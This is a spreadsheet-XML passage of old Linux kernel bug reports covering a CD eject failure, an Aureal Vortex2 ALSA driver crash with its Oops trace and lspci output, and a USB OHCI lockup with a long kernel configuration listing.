    <t>Distribution: Debian Woody Hardware Environment: Acer TravelMate 242X Software Environment: Linux vanilla-all versions Problem Description: PCI: Enabling device 00:1f.1 (0005 -&gt; 0007) ICH4: chipset revision 3 ICH4: not 100% native mode: will probe irqs later ide0: BM-DMA at 0x1810-0x1817, BIOS settings: hda:DMA, hdb:pio ide1: BM-DMA at 0x1818-0x181f, BIOS settings: hdc:DMA, hdd:pio hda: IC25N020ATMR04-0, ATA DISK drive blk: queue c034a0e0, I/O limit 4095Mb (mask 0xffffffff) hdc: SR244W1, ATAPI CD/DVD-ROM drive ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 ide1 at 0x170-0x177,0x376 on irq 15 hda: attached ide-disk driver. hda: host protected area =&gt; 1 hda: 39070080 sectors (20004 MB) w/1740KiB Cache, CHS=2432/255/63, UDMA(100) Partition check: hda: hda1 hda2 hda3 This drive is from Mitsumi Steps to reproduce: mount cd, umount it. Then when pressed button on cdrom, cdrom is not opened. When trying call eject, system tells: eject /dev/hdc eject: unable to eject, last error: Invalid argument</t>
  </si>
  <si>
    <t>vortex: IRQ fifo error, and Oops</t>
  </si>
  <si>
    <t>2.6.6, 2.6.7, 2.6.7-mm2, everything else with the aureal driver</t>
  </si>
  <si>
    <t>2004-06-26 07:49 UTC</t>
  </si>
  <si>
    <t>Stas Sergeev</t>
  </si>
  <si>
    <t>2006-01-06 08:50 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat FC2 Hardware Environment: lspci -v below Software Environment: linux-2.6.7-mm2, .config attached Problem Description: I have vortex2 soundcard. It used to work properly with the OSS driver, I only needed the VIA PCI fix like this: setpci -d '12eb:*' 40.B=ff But I was never able to get it working with ALSA. The first time I am trying the playback, I get: vortex: IRQ fifo error message, and a pure silence. (checked alsa-mixer - everything is enabled). Subsequent playback attempts results in a silence without any error messages. pcifix=3 option to the snd-au8830 module doesn't help. On module load I get in the log: Aureal Vortex 2 3D Sound Processor: vortex latency is 0xff rmmod'ing the module, I get this: Jun 26 17:53:03 lin kernel: Vortex: shutdown...&lt;1&gt;Unable to handle kernel paging request at virtual address ddbcce5a Jun 26 17:53:03 lin kernel: printing eip: Jun 26 17:53:03 lin kernel: e0977ee8 Jun 26 17:53:03 lin kernel: *pde = 00077067 Jun 26 17:53:03 lin kernel: Oops: 0000 [#1] Jun 26 17:53:03 lin kernel: PREEMPT SMP DEBUG_PAGEALLOC Jun 26 17:53:03 lin kernel: Modules linked in: radeon amd_k7_agp agpgart snd_pcm_oss snd_mixer_oss snd_au8830 snd_pcm snd_page_alloc snd_timer snd_ac97_codec gameport snd_mpu401_uart snd_rawmidi snd_seq_device snd soundcore ipv6 parport_pc lp parport autofs4 ne2k_pci 8390 ntfs nls_cp866 vfat fat usbhid sd_mod usb_storage scsi_mod uhci_hcd Jun 26 17:53:03 lin kernel: CPU: 0 Jun 26 17:53:03 lin kernel: EIP: 0060:[&lt;e0977ee8&gt;] Tainted: G S VLI Jun 26 17:53:03 lin kernel: EFLAGS: 00010282 (2.6.7-mm2) Jun 26 17:53:03 lin kernel: EIP is at vortex_connect_default+0x48/0x170 [snd_au8830] Jun 26 17:53:03 lin kernel: eax: ddbcce10 ebx: d6630018 ecx: 00000001 edx: d66324d4 Jun 26 17:53:03 lin kernel: esi: 00000000 edi: d66324d4 ebp: ce10be44 esp: ce10be30 Jun 26 17:53:03 lin kernel: ds: 007b es: 007b ss: 0068 Jun 26 17:53:03 lin kernel: Process rmmod (pid: 2744, threadinfo=ce10a000 task=cea4aa40) Jun 26 17:53:03 lin kernel: Stack: 00000003 00000000 d6630018 00002000 d60f2c0c ce10be54 e0979137 e097e640 Jun 26 17:53:03 lin kernel: d6630018 ce10be68 e097d54d e08ee259 e0947804 d671809c ce10be80 e08f2f19 Jun 26 17:53:03 lin kernel: 00000000 00000001 d60f2c0c d60f2d4c ce10bea4 e08f325f e08f28f1 00000003 Jun 26 17:53:03 lin kernel: Call Trace: Jun 26 17:53:03 lin kernel: [&lt;c01052ca&gt;] show_stack+0x7a/0x90 Jun 26 17:53:03 lin kernel: [&lt;c0105452&gt;] show_registers+0x152/0x1c0 Jun 26 17:53:03 lin kernel: [&lt;c0105622&gt;] die+0xc2/0x190 Jun 26 17:53:03 lin kernel: [&lt;c01174f4&gt;] do_page_fault+0x1d4/0x530 Jun 26 17:53:03 lin kernel: [&lt;c0104f5d&gt;] error_code+0x2d/0x38 Jun 26 17:53:03 lin kernel: [&lt;e0979137&gt;] vortex_core_shutdown+0x37/0xa0 [snd_au8830] Jun 26 17:53:03 lin kernel: [&lt;e097d54d&gt;] snd_vortex_dev_free+0x2d/0x80 [snd_au8830] Jun 26 17:53:03 lin kernel: [&lt;e08f2f19&gt;] snd_device_free+0xa9/0x120 [snd] Jun 26 17:53:03 lin kernel: [&lt;e08f325f&gt;] snd_device_free_all+0x5f/0x90 [snd] Jun 26 17:53:03 lin kernel: [&lt;e08ed0b6&gt;] snd_card_free+0x156/0x2e0 [snd] Jun 26 17:53:03 lin kernel: [&lt;e097da0f&gt;] snd_vortex_remove+0xf/0x1b [snd_au8830] Jun 26 17:53:03 lin kernel: [&lt;c01ea4de&gt;] pci_device_remove+0x2e/0x30 Jun 26 17:53:03 lin kernel: [&lt;c0217aa7&gt;] device_release_driver+0x57/0x60 Jun 26 17:53:03 lin kernel: [&lt;c0217ac9&gt;] driver_detach+0x19/0x30 Jun 26 17:53:03 lin kernel: [&lt;c0217e43&gt;] bus_remove_driver+0x53/0x90 Jun 26 17:53:03 lin kernel: [&lt;c0218357&gt;] driver_unregister+0x17/0x3d Jun 26 17:53:03 lin kernel: [&lt;c01ea6ee&gt;] pci_unregister_driver+0xe/0x20 Jun 26 17:53:04 lin kernel: [&lt;c01389e6&gt;] sys_delete_module+0x136/0x1a0 Jun 26 17:53:04 lin kernel: [&lt;c010447d&gt;] sysenter_past_esp+0x52/0x71 Jun 26 17:53:04 lin kernel: Code: 00 e8 0d ff ff ff 89 fa 89 f1 88 83 b2 24 00 00 89 d8 c7 04 24 03 00 00 00 e8 f5 fe ff ff 88 83 b3 24 00 00 8b 43 1c 85 c0 74 0a &lt;80&gt; 78 4a 00 0f 88 de 00 00 00 8d 8b b2 24 00 00 89 f2 89 d8 e8 Steps to reproduce: Well, easy:) There's simply no sound at all. Note that the programs I am using for playback, are using the OSS interface, maybe that matters. But I suspect the driver itself is the culprit. lspci -v follows: 00:00.0 Host bridge: Advanced Micro Devices [AMD] AMD-751 [Irongate] System Controller (rev 25) Flags: bus master, medium devsel, latency 64 Memory at e8000000 (32-bit, prefetchable) Memory at efdff000 (32-bit, prefetchable) [size=4K] I/O ports at dc00 [disabled] [size=4] Capabilities: [a0] AGP version 1.0 00:01.0 PCI bridge: Advanced Micro Devices [AMD] AMD-751 [Irongate] AGP Bridge (rev 01) (prog-if 00 [Normal decode]) Flags: bus master, 66Mhz, medium devsel, latency 64 Bus: primary=00, secondary=01, subordinate=01, sec-latency=64 I/O behind bridge: 00008000-00009fff Memory behind bridge: efe00000-efefffff Prefetchable memory behind bridge: d7c00000-e7cfffff Expansion ROM at 00008000 [disabled] [size=8K] 00:04.0 ISA bridge: VIA Technologies, Inc. VT82C686 [Apollo Super South] (rev 1b) Subsystem: Asustek Computer, Inc.: Unknown device 800d Flags: bus master, stepping, medium devsel, latency 0 00:04.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) (prog-if 8a [Master SecP PriP]) Flags: bus master, medium devsel, latency 32 I/O ports at ffa0 [size=16] Capabilities: [c0] Power Management version 2 00:04.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 0e) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. (Wrong ID) USB Controller Flags: bus master, medium devsel, latency 64, IRQ 10 I/O ports at d400 [size=32] Capabilities: [80] Power Management version 2 00:04.3 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 0e) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. (Wrong ID) USB Controller Flags: bus master, medium devsel, latency 64, IRQ 10 I/O ports at d800 [size=32] Capabilities: [80] Power Management version 2 00:04.4 SMBus: VIA Technologies, Inc. VT82C686 [Apollo Super ACPI] (rev 20) Flags: medium devsel 00:0f.0 Multimedia audio controller: Aureal Semiconductor Vortex 2 (rev fe) Subsystem: Diamond Multimedia Systems Monster Sound II Flags: bus master, medium devsel, latency 64, IRQ 10 Memory at eff40000 (32-bit, non-prefetchable) I/O ports at d000 [size=8] I/O ports at cc00 [size=8] Capabilities: [dc] Power Management version 1 00:10.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8029(AS) Flags: medium devsel, IRQ 10 I/O ports at c800 [size=efff0000] Expansion ROM at 00008000 [disabled] 01:05.0 VGA compatible controller: ATI Technologies Inc Radeon RV200 QW [Radeon 7500] (prog-if 00 [VGA]) Subsystem: ATI Technologies Inc Radeon 7500 Flags: bus master, stepping, 66Mhz, medium devsel, latency 64, IRQ 9 Memory at d8000000 (32-bit, prefetchable) [size=efec0000] I/O ports at 9800 [size=256] Memory at efef0000 (32-bit, non-prefetchable) [size=64K] Expansion ROM at 00020000 [disabled] Capabilities: [58] AGP version 2.0 Capabilities: [50] Power Management version 2</t>
  </si>
  <si>
    <t>USB OHCI_HCD locks up, and councels URB, and won't detect more USB devices.</t>
  </si>
  <si>
    <t>2.6.7 - 2.6.8.1</t>
  </si>
  <si>
    <t>2004-06-26 17:09 UTC</t>
  </si>
  <si>
    <t>Brian Beardall</t>
  </si>
  <si>
    <t>2004-11-10 16:26 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 2004.1 Hardware Environment: AMD Athlon 800 Mhz, MSI 6195 mainboard with AMD Irongate chipset, and 512 mbytes of ram. Software Environment: USB Kernel, bash / system startup Problem Description: USB locks-up / system lock-up Steps to reproduce: compile a kernel with these options. # # Automatically generated make config: don't edit # CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y CONFIG_CLEAN_COMPILE=y CONFIG_STANDALONE=y CONFIG_BROKEN_ON_SMP=y # # General setup # CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_POSIX_MQUEUE=y # CONFIG_BSD_PROCESS_ACCT is not set CONFIG_SYSCTL=y CONFIG_AUDIT=y CONFIG_AUDITSYSCALL=y CONFIG_LOG_BUF_SHIFT=14 CONFIG_HOTPLUG=y # CONFIG_IKCONFIG is not set # CONFIG_EMBEDDED is not set CONFIG_KALLSYMS=y CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y CONFIG_IOSCHED_CFQ=y # CONFIG_CC_OPTIMIZE_FOR_SIZE is not set # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y # CONFIG_MODULE_FORCE_UNLOAD is not set CONFIG_OBSOLETE_MODPARM=y # CONFIG_MODVERSIONS is not set CONFIG_KMOD=y # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_ELAN is not set # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_X86_ES7000 is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set # CONFIG_MPENTIUMIII is not set # CONFIG_MPENTIUMM is not set # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set CONFIG_MK7=y # CONFIG_MK8 is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set # CONFIG_X86_GENERIC is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=6 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_USE_3DNOW=y # CONFIG_HPET_TIMER is not set # CONFIG_HPET_EMULATE_RTC is not set # CONFIG_SMP is not set CONFIG_PREEMPT=y # CONFIG_X86_UP_APIC is not set CONFIG_X86_TSC=y CONFIG_X86_MCE=y CONFIG_X86_MCE_NONFATAL=y # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_MICROCODE is not set # CONFIG_X86_MSR is not set # CONFIG_X86_CPUID is not set # # Firmware Drivers # # CONFIG_EDD is not set CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y CONFIG_HAVE_DEC_LOCK=y # CONFIG_REGPARM is not set # # Power management options (ACPI, APM) # CONFIG_PM=y # CONFIG_SOFTWARE_SUSPEND is not set # CONFIG_PM_DISK is not set # # ACPI (Advanced Configuration and Power Interface) Support # # CONFIG_ACPI is not set CONFIG_ACPI_BOOT=y # # APM (Advanced Power Management) BIOS Support # CONFIG_APM=y # CONFIG_APM_IGNORE_USER_SUSPEND is not set CONFIG_APM_DO_ENABLE=y # CONFIG_APM_CPU_IDLE is not set CONFIG_APM_DISPLAY_BLANK=y CONFIG_APM_RTC_IS_GMT=y # CONFIG_APM_ALLOW_INTS is not set # CONFIG_APM_REAL_MODE_POWER_OFF is not set # # CPU Frequency scaling # # CONFIG_CPU_FREQ is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GOMMCONFIG is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y CONFIG_PCI_MMCONFIG=y CONFIG_PCI_LEGACY_PROC=y CONFIG_PCI_NAMES=y CONFIG_ISA=y # CONFIG_EISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set # # PCMCIA/CardBus support # # CONFIG_PCMCIA is not set CONFIG_PCMCIA_PROBE=y # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_BINFMT_ELF=y CONFIG_BINFMT_AOUT=y CONFIG_BINFMT_MISC=y # # Device Drivers # # # Generic Driver Options # # CONFIG_FW_LOADER is not set # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=y CONFIG_PARPORT_PC=y CONFIG_PARPORT_PC_CML1=y CONFIG_PARPORT_SERIAL=y # CONFIG_PARPORT_PC_FIFO is not set # CONFIG_PARPORT_PC_SUPERIO is not set # CONFIG_PARPORT_OTHER is not set CONFIG_PARPORT_1284=y # # Plug and Play support # CONFIG_PNP=y # CONFIG_PNP_DEBUG is not set # # Protocols # # CONFIG_ISAPNP is not set # CONFIG_PNPBIOS is not set # # Block devices # CONFIG_BLK_DEV_FD=y # CONFIG_BLK_DEV_XD is not set # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set CONFIG_BLK_DEV_LOOP=m # CONFIG_BLK_DEV_CRYPTOLOOP is not set # CONFIG_BLK_DEV_NBD is not set # CONFIG_BLK_DEV_CARMEL is not set # CONFIG_BLK_DEV_RAM is not set CONFIG_LBD=y # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set CONFIG_BLK_DEV_IDEDISK=y # CONFIG_IDEDISK_MULTI_MODE is not set CONFIG_BLK_DEV_IDECD=y # CONFIG_BLK_DEV_IDETAPE is not set # CONFIG_BLK_DEV_IDEFLOPPY is not set # CONFIG_BLK_DEV_IDESCSI is not set # CONFIG_IDE_TASK_IOCTL is not set CONFIG_IDE_TASKFILE_IO=y # # IDE chipset support/bugfixes # # CONFIG_IDE_GENERIC is not set # CONFIG_BLK_DEV_CMD640 is not set # CONFIG_BLK_DEV_IDEPNP is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y # CONFIG_BLK_DEV_OFFBOARD is not set # CONFIG_BLK_DEV_GENERIC is not set # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_RZ1000 is not set CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set CONFIG_BLK_DEV_ADMA=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set CONFIG_BLK_DEV_AMD74XX=y # CONFIG_BLK_DEV_ATIIXP is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set # CONFIG_BLK_DEV_PIIX is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set # CONFIG_IDE_ARM is not set # CONFIG_IDE_CHIPSETS is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_IVB is not set CONFIG_IDEDMA_AUTO=y # CONFIG_BLK_DEV_HD is not set # # SCSI device support # CONFIG_SCSI=y CONFIG_SCSI_PROC_FS=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=y # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set # CONFIG_BLK_DEV_SR is not set CONFIG_CHR_DEV_SG=y # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # # CONFIG_SCSI_MULTI_LUN is not set # CONFIG_SCSI_CONSTANTS is not set # CONFIG_SCSI_LOGGING is not set # # SCSI Transport Attributes # # CONFIG_SCSI_SPI_ATTRS is not set # CONFIG_SCSI_FC_ATTRS is not set # # SCSI low-level drivers # # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_7000FASST is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AHA152X is not set # CONFIG_SCSI_AHA1542 is not set # CONFIG_SCSI_AACRAID is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_SCSI_DPT_I2O is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_IN2000 is not set # CONFIG_SCSI_MEGARAID is not set # CONFIG_SCSI_SATA is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_DTC3280 is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_GENERIC_NCR5380 is not set # CONFIG_SCSI_GENERIC_NCR5380_MMIO is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_IMM is not set # CONFIG_SCSI_NCR53C406A is not set # CONFIG_SCSI_SYM53C8XX_2 is not set # CONFIG_SCSI_IPR is not set # CONFIG_SCSI_PAS16 is not set # CONFIG_SCSI_PSI240I is not set # CONFIG_SCSI_QLOGIC_FAS is not set # CONFIG_SCSI_QLOGIC_ISP is not set # CONFIG_SCSI_QLOGIC_FC is not set # CONFIG_SCSI_QLOGIC_1280 is not set CONFIG_SCSI_QLA2XXX=y # CONFIG_SCSI_QLA21XX is not set # CONFIG_SCSI_QLA22XX is not set # CONFIG_SCSI_QLA2300 is not set # CONFIG_SCSI_QLA2322 is not set # CONFIG_SCSI_QLA6312 is not set # CONFIG_SCSI_QLA6322 is not set # CONFIG_SCSI_SYM53C416 is not set # CONFIG_SCSI_DC395x is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_T128 is not set # CONFIG_SCSI_U14_34F is not set # CONFIG_SCSI_ULTRASTOR is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set # # Old CD-ROM drivers (not SCSI, not IDE) # # CONFIG_CD_NO_IDESCSI is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # # IEEE 1394 (FireWire) support # # CONFIG_IEEE1394 is not set # # I2O device support # # CONFIG_I2O is not set # # Networking support # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y # CONFIG_PACKET_MMAP is not set # CONFIG_NETLINK_DEV is not set CONFIG_UNIX=y # CONFIG_NET_KEY is not set CONFIG_INET=y CONFIG_IP_MULTICAST=y # CONFIG_IP_ADVANCED_ROUTER is not set # CONFIG_IP_PNP is not set # CONFIG_NET_IPIP is not set # CONFIG_NET_IPGRE is not set # CONFIG_IP_MROUTE is not set # CONFIG_ARPD is not set # CONFIG_SYN_COOKIES is not set # CONFIG_INET_AH is not set # CONFIG_INET_ESP is not set # CONFIG_INET_IPCOMP is not set CONFIG_IPV6=y # CONFIG_IPV6_PRIVACY is not set # CONFIG_INET6_AH is not set # CONFIG_INET6_ESP is not set # CONFIG_INET6_IPCOMP is not set # CONFIG_IPV6_TUNNEL is not set # CONFIG_NETFILTER is not set # # SCTP Configuration (EXPERIMENTAL) # # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_BRIDGE is not set # CONFIG_VLAN_8021Q is not set # CONFIG_DECNET is not set # CONFIG_LLC2 is not set # CONFIG_IPX is not set # CONFIG_ATALK is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_FASTROUTE is not set # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set # CONFIG_NETPOLL is not set # CONFIG_NET_POLL_CONTROLLER is not set # CONFIG_HAMRADIO is not set # CONFIG_IRDA is not set # CONFIG_BT is not set CONFIG_NETDEVICES=y # CONFIG_DUMMY is not set # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # CONFIG_NET_SB1000 is not set # # ARCnet devices # # CONFIG_ARCNET is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y CONFIG_MII=y # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set # CONFIG_NET_VENDOR_3COM is not set # CONFIG_LANCE is not set # CONFIG_NET_VENDOR_SMC is not set # CONFIG_NET_VENDOR_RACAL is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_AT1700 is not set # CONFIG_DEPCA is not set # CONFIG_HP100 is not set # CONFIG_NET_ISA is not set CONFIG_NET_PCI=y # CONFIG_PCNET32 is not set # CONFIG_AMD8111_ETH is not set # CONFIG_ADAPTEC_STARFIRE is not set # CONFIG_AC3200 is not set # CONFIG_APRICOT is not set # CONFIG_B44 is not set # CONFIG_FORCEDETH is not set # CONFIG_CS89x0 is not set # CONFIG_DGRS is not set # CONFIG_EEPRO100 is not set # CONFIG_E100 is not set # CONFIG_FEALNX is not set CONFIG_NATSEMI=y # CONFIG_NE2K_PCI is not set # CONFIG_8139CP is not set # CONFIG_8139TOO is not set # CONFIG_SIS900 is not set # CONFIG_EPIC100 is not set # CONFIG_SUNDANCE is not set # CONFIG_TLAN is not set # CONFIG_VIA_RHINE is not set # CONFIG_NET_POCKET is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SK98LIN is not set # CONFIG_TIGON3 is not set # # Ethernet (10000 Mbit) # # CONFIG_IXGB is not set # CONFIG_S2IO is not set # # Token Ring devices # # CONFIG_TR is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Wan interfaces # # CONFIG_WAN is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set CONFIG_PPP=y # CONFIG_PPP_MULTILINK is not set # CONFIG_PPP_FILTER is not set # CONFIG_PPP_ASYNC is not set # CONFIG_PPP_SYNC_TTY is not set # CONFIG_PPP_DEFLATE is not set # CONFIG_PPP_BSDCOMP is not set # CONFIG_PPPOE is not set # CONFIG_SLIP is not set # CONFIG_NET_FC is not set # CONFIG_SHAPER is not set # CONFIG_NETCONSOLE is not set # # ISDN subsystem # # CONFIG_ISDN is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 CONFIG_INPUT_JOYDEV=y # CONFIG_INPUT_TSDEV is not set # CONFIG_INPUT_EVDEV is not set # CONFIG_INPUT_EVBUG is not set # # Input I/O drivers # CONFIG_GAMEPORT=y CONFIG_SOUND_GAMEPORT=y # CONFIG_GAMEPORT_NS558 is not set # CONFIG_GAMEPORT_L4 is not set CONFIG_GAMEPORT_EMU10K1=y # CONFIG_GAMEPORT_VORTEX is not set # CONFIG_GAMEPORT_FM801 is not set # CONFIG_GAMEPORT_CS461x is not set CONFIG_SERIO=y CONFIG_SERIO_I8042=y # CONFIG_SERIO_SERPORT is not set # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set # CONFIG_SERIO_PCIPS2 is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_LKKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y # CONFIG_MOUSE_SERIAL is not set # CONFIG_MOUSE_INPORT is not set # CONFIG_MOUSE_LOGIBM is not set # CONFIG_MOUSE_PC110PAD is not set # CONFIG_MOUSE_VSXXXAA is not set CONFIG_INPUT_JOYSTICK=y # CONFIG_JOYSTICK_ANALOG is not set # CONFIG_JOYSTICK_A3D is not set # CONFIG_JOYSTICK_ADI is not set # CONFIG_JOYSTICK_COBRA is not set # CONFIG_JOYSTICK_GF2K is not set # CONFIG_JOYSTICK_GRIP is not set # CONFIG_JOYSTICK_GRIP_MP is not set # CONFIG_JOYSTICK_GUILLEMOT is not set CONFIG_JOYSTICK_INTERACT=y # CONFIG_JOYSTICK_SIDEWINDER is not set # CONFIG_JOYSTICK_TMDC is not set # CONFIG_JOYSTICK_IFORCE is not set # CONFIG_JOYSTICK_WARRIOR is not set # CONFIG_JOYSTICK_MAGELLAN is not set # CONFIG_JOYSTICK_SPACEORB is not set # CONFIG_JOYSTICK_SPACEBALL is not set # CONFIG_JOYSTICK_STINGER is not set # CONFIG_JOYSTICK_TWIDDLER is not set # CONFIG_JOYSTICK_DB9 is not set # CONFIG_JOYSTICK_GAMECON is not set # CONFIG_JOYSTICK_TURBOGRAFX is not set # CONFIG_INPUT_JOYDUMP is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=y # CONFIG_SERIAL_8250_CONSOLE is not set CONFIG_SERIAL_8250_NR_UARTS=4 # CONFIG_SERIAL_8250_EXTENDED is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=y CONFIG_UNIX98_PTYS=y CONFIG_LEGACY_PTYS=y CONFIG_LEGACY_PTY_COUNT=256 CONFIG_PRINTER=y # CONFIG_LP_CONSOLE is not set # CONFIG_PPDEV is not set # CONFIG_TIPAR is not set # CONFIG_QIC02_TAPE is not set # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set # CONFIG_HW_RANDOM is not set # CONFIG_NVRAM is not set # CONFIG_RTC is not set # CONFIG_GEN_RTC is not set # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set # # Ftape, the floppy tape device driver # # CONFIG_FTAPE is not 